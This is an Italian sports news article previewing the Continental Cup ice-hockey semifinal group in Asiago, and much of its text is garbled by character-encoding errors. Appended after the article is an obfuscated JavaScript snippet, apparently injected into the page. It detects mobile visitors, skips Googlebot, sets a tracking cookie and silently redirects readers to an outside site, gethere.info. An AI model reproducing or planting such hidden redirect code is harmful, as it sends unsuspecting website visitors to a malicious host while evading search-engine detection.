News

Sul ghiaccio del Pala Odegar ad Asiago la sida per la conquista della Continental Cup

Un weekend tutto dedicato all’hockey su ghiaccio ad Asiago, dal 20 al 22 novembre. La Continental Cup,A� dopo i quarti di finale disputati a Tychy in Polonia ed a Miskolc in Ungheria, vede al completo il tabellone del Gruppo D, con le quattro squadre pronte a sfidarsi nelle semifinali, per aggiudicarsi due posti alla SuperFinal del prestigioso torneo europeo. Tra queste anche la nostra Asiago Hockey 1935, che nel 2013 ha chiuso la competizione al terzo posto, mancando la conquista della coppa dopo una corsa mozzafiato. A�I Leoni asiaghesi, da venerdA� alle 20.30, si cimenteranno, sul ghiaccio dello stadio Odegar di Asiago, in una tre giorni ad altissima tensione contro i danesi dell’Herning Blue Fox, i kazaki dello Yertis Pavlodar e i lettoni dell’HK Mogo Riga. L’Asiago Hockey 1935 proverA� a staccare di nuovo la��agognato biglietto per la SuperFinal di Continental Cup, che si terrA� in un luogo ancora da definire la��8, 9 e 10 gennaio 2016, affrontando tre formazioni davvero agguerrite.

La��HK Mogo Riga, dopo aver vinto il titolo lettone lo scorso anno, arriva ad Asiago da capolista del proprio campionato, con 21 punti conquistati in nove partite, frutto di sette vittorie e solo due sconfitte.A� Tra i giocatori spicca Miks Lipsbergs, numero 91 eA� autore di 4 goal e 2 assist durante il girone ungherese ma anche ad un collettivo di grande qualitA� che in patria sta dominando e punta a farlo anche in Continental Cup. Sul ghiaccio di Asiago attenzione perA? anche e soprattutto al difensore Agris Saviels, 63esima scelta al secondo round del draft NHL del 2000 dai Colorado Avalanche e protagonista in nazionale ai giochi olimpici di Torino 2006 e a svariate edizioni dei campionati del mondo.

Lo Yertis Pavlodar ha vinto tre scudettiA�in A�cinque stagioni spettacolari e in panchina, da ottobre, ha un nuovo coach: il 48enne ceco Ladislav Lubina.

Attardati nel campionato danese, i danesi della��Herning Blue Fox giungeranno ad Asiago con un chiaro obiettivo: spegnere la��entusiasmo del pubblico di casa e conquistare la��accesso al round finale. Per farlo si affidano al coach Mario Simioni, uno che ad Asiago ha giocato dalla��85 al a�?92, tornando poi per una breve parentesi nella stagione 97-98.

In casa Asiago Hockey 1935 si respira la tensione e la concentrazione dei grandi avvenimenti, ma anche la��ottimismo e la convinzione di poter disputare un girone di semifinale da protagonisti, sotto la guida del coach Patrice Lefebvre.

Sei partite da vivere fino alla��ultimo secondo, per spingere a gran voce i Leoni asiaghesi a cui non mancherA�, come di consueto, la��appoggio del Gruppo Brazzale, main sponsor della manifestazione. La��azienda sarA� presente anche allo stadio Odegar con la ormai classica merenda a base di a�?pane, burro e zuccheroa�? con il nuovo Burro Superiore Fratelli Brazzale. La��azienda casearia piA? antica da��Italia, con sede a ZanA? (VI), sarA� infatti, insieme a tutti i suoi prodotti, lo sponsor della��intera tre giorni europea che i tifosi stanno attendendo con trepidazione. La Continental Cup si potrA� seguire anche in diretta streaming Hd, per quanti non potessero raggiungere la��Odegar, su www.asiago.tv.

La manifestazione si gioca perA? in un clima difficile per la��Europa e il mondo intero. E in queste giornate cosA� drammatiche, anche gli assi della��hockey faranno sentire la propria vicinanza alle vittime di Parigi prima di ciascuna delle sei partite, commemorando quanti sono caduti per mano del terrorismo e manifestando la propria solidarietA� ai parenti delle vittime.

Nelle stesse giornate, a Rouen, in Francia, le quattro compagini del gruppo E (Dragons de Rouen, Shakhtyor Soligorsk, HK Kremenchuk e GKS Tychy) si sfideranno per gli altri due posti disponibili per la SuperFinal.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}